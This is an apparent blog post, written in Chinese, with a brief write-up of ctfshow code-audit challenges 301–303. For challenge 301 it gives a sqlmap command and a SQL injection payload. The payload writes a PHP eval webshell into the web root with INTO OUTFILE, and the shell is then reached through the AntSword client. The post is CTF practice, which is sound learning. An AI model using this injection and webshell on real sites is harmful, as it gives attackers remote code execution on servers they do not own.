ctfshow代码审计篇

芜湖今天吧驾照靠过了,累死我了,睡一天才缓过劲来

301

在这里插入图片描述
首先sql语句没过滤,考虑sql注入
用sqlmap。就行
sqlmap.py -u http://0037a292-7a81-4c5f-a925-281dba2c5fe5.challenge.ctf.show:8080/login.php --form --batch --dump
但是我没跑出来,可以利用sql写一句话
userid=a ’ union select “<?php eval($_POST[1]);?>” into outfile “/var/www/html/a.php”%23&userpwd=b
注意的是他开头是个login.php, 抓包后跳转到checklogin.php上
然后用蚁剑连接即可
之所以能写马是因为他是先查用户名是否在库中然后匹配密码的

302

还是可以写shell

303

不行了,头晕,难受

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值